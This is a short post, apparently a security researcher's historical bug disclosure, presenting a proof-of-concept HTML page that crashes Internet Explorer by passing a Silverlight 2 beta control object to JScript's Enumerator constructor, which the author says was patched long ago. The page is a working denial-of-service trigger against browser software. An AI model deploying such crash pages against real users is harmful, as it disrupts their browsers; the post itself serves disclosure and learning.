Another brief one from the same Silverlight testing session. Passing the userControl object from the onLoad event into IE’s Enumerator constructor would crash the browser immediately. The crash was reproducible on demand by clicking a button to (re)load the control.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>DoS_Silverlight_userControl_Enumerator</title>
</head>
<body>
<h1>DoS_Silverlight_userControl_Enumerator</h1>
<script language="JavaScript">
function onSilverlightLoad(userControl)
{
new Enumerator(userControl);
}
</script>
<object id="SilverlightControl" data="data:application/x-silverlight," type="application/x-silverlight-2-b1" width="450" height="50">
<param name="source" value="any_xap_is_fine.xap"/>
<param name="onLoad" value="onSilverlightLoad" />
<param name="enableHtmlAccess" value="true" />
<param name="background" value="white" />
</object>
<br />
<input type="button" onclick="document.getElementById('SilverlightControl').Source='any_xap_is_fine.xap'" value="Load the Control!" /><br />
(the onload will fire and the browser will crash)
<br /><small>Tested on Silverlight v.2.0.<b>30220</b>.0</small>
</body>
</html>
The Enumerator constructor in JScript is designed for COM collection objects. When handed the Silverlight userControl reference, it triggered an unhandled exception inside the Silverlight host, taking the browser down with it. Any XAP file worked — even a trivially small one. Tested on Silverlight 2.0.30220.0.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.